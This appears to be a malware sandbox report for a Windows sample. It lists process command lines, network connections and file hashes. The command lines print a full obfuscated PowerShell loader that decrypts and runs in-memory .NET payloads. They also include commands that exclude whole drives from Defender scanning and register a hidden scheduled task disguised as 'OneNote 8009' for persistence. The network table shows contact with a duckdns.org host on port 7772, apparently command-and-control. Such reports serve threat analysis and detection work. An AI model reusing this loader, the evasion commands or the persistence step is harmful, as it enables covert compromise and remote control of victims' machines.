C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb 
([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 8009' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\SC3.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\SC3.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\SC3.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 
6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC3')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 8009' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | udp |
| CO | 186.169.73.205:7772 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | tcp |
| US | 8.8.8.8:53 | 205.73.169.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sh0gibcp.kay.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8cfdd430773e30dfb63ed9de3ba5a2a6 |
| SHA1 | e7455b94f641e068089ae1e75264f38f49d569af |
| SHA256 | b86d3b554d259cb4c2ba391c7e91840db57a9a0d4ffd54b6e1b200f344374353 |
| SHA512 | 095fc7867aff19f262ad3ae40712f2012be0f11a03111a7e8784dfdfa74280c56ac257ba46fd72a447d3eae9835d268e5d883880bdbc4509075cb8b1f663dc45 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e4de99c1795fd54aa87da05fa39c199c |
| SHA1 | dfaaac2de1490fae01104f0a6853a9d8fe39a9d7 |
| SHA256 | 23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457 |
| SHA512 | 796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926 |
C:\Users\Admin\AppData\Roaming\SC3.cmd
| MD5 | aebbb92d1f67cddf37f996695175153e |
| SHA1 | 8706b8f0d37fb05aa70f32d78c3d8469b64c7c27 |
| SHA256 | 2ad358d7ccdb651d4603cb591a2eb19416ed453a8cf19c82cb2717477db518a7 |
| SHA512 | 60e261b245fb23c75cd7fc0e507daa3e6f39f7f86261622ca90fd21dafda481abd0d80d7befe01ebe31a3f25485df298445662dfb8041fa0e607c85c31425ce6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3dce19ecdd160f6404640096e42f78d8 |
| SHA1 | 1de523276924b703a80edf61ca63b602e8def64a |
| SHA256 | a3be9b1ae4d07c1977ef244909e08b80ad29b98d261c5e750e0c84e2d4f82883 |
| SHA512 | 6d641804c7945423f26b31130082f3fdb6ba79d3b12b3fdd85d1f058de1b0deab2e0b2abff113145f5d8a4fd88b692d897ab237dfceaa18243329a2b800874b6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 410142fcf54278e9a6808d8deca7452c |
| SHA1 | 4136e390b6ec038332d663d6abe42bbc8ccd7ae6 |
| SHA256 | 040f302866c5636391c4212ff54bcfcc20c386716795924f7b00af56b33ddf54 |
| SHA512 | bd3ffce2e24cef867f157bf90a1271e4c3ec56b597c9eea6161279d6ecb9c193458c9c509d1ca4e60d6b4ca451a5879e2628f63aaaccfd169a7e9dba4ee7d12a |